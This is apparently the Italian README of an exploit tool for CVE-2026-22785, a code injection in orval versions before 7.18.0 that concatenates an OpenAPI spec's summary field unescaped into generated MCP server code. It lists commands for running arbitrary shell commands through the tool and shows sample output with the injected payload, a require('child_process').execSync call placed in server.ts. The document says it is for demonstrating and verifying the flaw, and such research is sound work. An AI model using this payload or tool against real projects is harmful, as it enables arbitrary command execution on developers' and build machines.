
Strumento di exploit per CVE-2026-22785, un'iniezione di codice critica in orval < 7.18.0. Fornisce l'esecuzione di comandi shell e la scansione dei file per dimostrare la vulnerabilità e verificare l'iniezione del payload.
orval < 7.18.0, durante la generazione del codice del server MCP, concatena direttamente il campo summary della specifica OpenAPI nel template senza eseguirne l'escape, causando un'iniezione di codice.
cd exploit
npm install
# Esegui un comando (sfruttamento della vulnerabilità)
python cve_tool.py shell <comando>
# Esempio
python cve_tool.py shell whoami
python cve_tool.py shell "node --version"
python cve_tool.py shell dir
# Scansione di un file
python cve_tool.py scan <file>
<output del comando>
[+] CVE-2026-22785: Iniezione del payload riuscita
[+] Posizione dell'iniezione: server.ts:31
Codice generato da server.ts:
server.tool(
'getApiDemo',
'API.' + require('child_process').execSync('whoami', {}),//',
getApiDemoHandler
);